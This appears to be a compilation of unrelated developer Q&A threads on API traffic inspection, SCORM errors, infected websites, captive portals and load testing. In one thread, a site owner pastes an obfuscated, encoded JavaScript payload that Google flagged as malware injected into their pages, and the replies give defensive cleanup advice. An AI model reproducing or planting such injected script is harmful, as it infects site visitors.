View API data with chrome DevTools - api

I am working on a site that uses the PayPal API. This new site will replace the old site at my job. As of right now, I need to check what data the old site sent to the PayPal API. Is there a way to check what data is being sent to and from a different site or API? It is data that is not typed in by the user, but data that already exists in the database that is being sent to the API.
Any help or advice would be great.
Thank you!

It "depends". On Windows platform you could use:
Fiddler or;
Microsoft Message Analyzer
to inspect traffic i/o (on the client system where either tool is installed). I'm sure other platforms will have similar tools.
Chrome Dev (or any other browser) tool will help with browser based traffic.
IMHO, depending on how "old" the existing system is, it maybe worth looking at the API again to see if any newer features are worth the effort since you're updating things...and seems to me getting paid/payments systems/ops would be something high on the priority list :)
Hth...

Related

RROR – unable to acquire LMS API, content may not play properly and results may not be recorded. Please contact technical support

We are in the process of implementing Success Factors LMS, and trying to play and view SCORM compatible files exported from Adobe Captivate 8 and 9 in Success Factors LMS.
I get the message - 'ERROR – unable to acquire LMS API, content may not play properly and results may not be recorded. Please contact technical support’
I have tried SCORM versions 1.2 v3 and 2004 V2 and V4. We can view the content, however it does not track, show as complete etc.
We are also producing Scorm compliant files using Skillcast and Articulate, but we still hit the same issue, we can view the content after closing the API error window, but still does not track.
Anyone experienced this problem before? Or know of a fix?
Many thanks
Normally this issue comes up when the course is unable to get the SCORM API from the LMS...I have seen a ton of SCORM content running in Success Factors before, so I wonder if the issue is in the setup. Are you seeing any "Access Denied" type errors in the browser element inspector/developer tools? I wonder if the course just can not find/have access to the player window. If the course is launching in a new window, you may want to try launching it in the frameset. I have seen folks get around this issue by making sure the player and sco are in the same window...
If you wanted to rule out the content being the issue, you can always test your content in the SCORM Cloud's free sandbox (https://cloud.scorm.com) to make sure the course is properly asking for the API...
If you have any other questions, we would be happy to help...you can just shoot us an email at support#scorm.com.
Thank you!
Joe
The error occurs because the content is not speaking to the Learning Management System (LMS). The code that runs to initialize the session doesn't happen. There is no return "ping" from the LMS.
You will get this error when you publish in SCORM and run from your desktop, or from a web server that isn't connected to an LMS. If it occurs when you are launching from an LMS it can either mean that the SCORM API isn't configured correctly, or your content server is on a different domain (cross-domain) than your application servers.
To test, you should try launching your content in different browsers. Our system was configured in such a way that Firefox and Chrome read our content to be cross-domain issue, and threw the SCORM API error, but Internet Explorer worked just fine.
In the end, it was determined that our server configuration in tandem with our firewall and security settings read the Content server as cross-domain and we had to redeploy our content servers within the firewall.

How do I go about safely taking a screenshot of a website that I know is infected with malware?

Background:
One of my clients' websites has become a malware infested hotbed.
Disposing of the malware has proven difficult and time consuming, and, in the meantime, we still have had to do work on the site.
For now, we went to some trouble to do our work - creating a disposable VM to just run a web browser, so we can see what the site looks like for the designers' work, for example.
I'm wondering if there's an easier (and faster) way to get an idea what the design of the site looks like. Not everyone on the project is tech savvy enough to be trusted with, for example, properly handling switching VMs.
Question:
Is there a method for safely seeing what a malware infested website looks like (for example, a service which will browse the site for me and send a screenshot), one which ideally is easy and simple enough to use that I can trust our non-tech-savvy designers to user?
You might take at look at Internet Archive: Wayback Machine to see if the site has been archived.
If a screenshot is all you need, there are several online browser simulators, such as Net Renderer (which will run any inputted web URL in a given version of Internet Explorer and then supply a screenshot). You might also try BrowserStack, which requires an account, and is not free, but does have a free trial period, and offers more than Internet Exploder.
You could also try running a browser in Sandboxie, which is simpler to set up and use than a VM (you just install it, and then use the windows right-click menu to launch any program in a sandbox of your choosing). However, it isn't free for commercial use.
I don't know if exist a standalone tool to parse a website for malwares, but I think this can help you, it's a google tool that you can you with a request and they will send you a response.
Follow the link:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328
Hope it helped.

Malware on the site as per google but I cannot find it

yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
deactivate plugins that are not high ranked or from reputed source.
Use secure protocols.check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :
Change your passwords.
Restore the most recent non compromised backup.

Wireless Authentication Page iOS app

I'm not really sure how to word this exactly, so hopefully someone can make sense of it. I've been working on an iPad app that syncs files from a server to your iPad and lets you build presentations with the various files. The corporation I'm working with on this app has a wireless network that requires you to re-authenticate every hour. So every hour instead of getting the expected JSON api response, any HTTP request pulls down the page needed to reauth with the wireless network. I was wondering is there is a specific HTTP response code related to getting sent that page or a "best-practice" way of testing for that page as opposed to JSON.
Granted I could just test to see if the response is HTML, but that doesn't account for other redirect responses that I haven't found yet. I could just test part of the HTML to see if it matches a predetermined portion of the html, but I'm an outside contractor. I can't guarantee they won't change the markup or verbiage of the page after I've made my deliverable.
So does anyone out in the ether know a "best practices" methodology for testing if the app needs to reauth before syncing?
I noticed that on Mac OS X and maybe even iOS, when you connect to a new Wi-Fi network, it will try to contact www.apple.com. This is being done to check if the internet connectivity is available. If it's not available, the Captive Network Assistant will pop-up, showing you the authentication page, or sometimes when I'm in Starbucks, an advertisement.
Following your question, since Apple themselves is doing it this way, I think you could check for HTTP response code, look for something in the HTML markup (slightly discouraged though) or trying to connect to a known server (Reachability).
For a corporation practicing well-documented projects, I am quite sure they won't be changing things without making sure that your app, once deployed will continue to work.

Load testing comet based application

We have developed a comet based application for chat (using streaming approach). The application has been developed in ASP .Net 3.5 sp1.
The browser has two connections with the server. One for posting and another for receiving chat messages. While load testing with Jmeter or VSTS the posting is getting recorded and load tested but not the receiving portion. Can some one please suggest any load testing tool which can address this issue.
I've come across the same problem, the top runner for me at the moment is browsermob.com. It has a complete API that allows you to create test scenarios that can "watch and wait" on pages recording every http request made as though they are visiting through a real browser. It gets kind of expensive if you need to test with more than 25 concurrent users (browser users), but seems very reasonably priced from what I have seen so far.
It'd be really interesting to see what tools others who are somewhat technically inept are using.
http://docs.codehaus.org/display/JETTY/Stress+Testing+Cometd